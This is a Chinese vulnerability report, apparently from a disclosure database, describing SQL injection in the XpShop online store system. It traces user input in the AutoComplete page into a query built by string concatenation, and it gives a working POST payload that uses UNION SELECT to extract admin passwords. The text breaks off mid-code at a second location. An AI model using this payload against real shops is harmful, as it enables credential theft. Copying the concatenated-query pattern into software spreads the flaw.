xpshop网店系统sql注入3枚打包

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 这是第二发 ### 详细说明: 漏洞位置:XpShop.WebUI.AutoComplete ``` protected void Page_Load(object sender, EventArgs e) { string input = this.GetInput(); if (input == "") { base.Response.Write(Utils.ShowMsg("非法调用!")); } else { base.Response.Write(this.GetProductName(input)); base.Response.End(); } } ``` 跟进这个函数GetProductName: ``` private string GetProductName(string pname) { ProductDB productDB = new ProductDB(); return productDB.GetProductNameByAjax(pname); } ``` 继续跟进GetProductNameByAjax: ``` public string GetProductNameByAjax(string productName) { string commandText = "SELECT Top 15 ProductName FROM Product WHERE ProductName Like '%" + productName + "%' ORDER BY Sort DESC"; DataSet dataSet = XpShopDB.ExecuteDataset(XpShopDB.ConnectionString, CommandType.Text, commandText, null); return dataSet.GetXml(); } ``` 进库也是没过滤的,搜索型注入。 payload: post: pname=test%' union select password from admin-- 漏洞地址: namespace XpShop.WebUI.AJAX 代码: ``` private void BindActive() { if...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息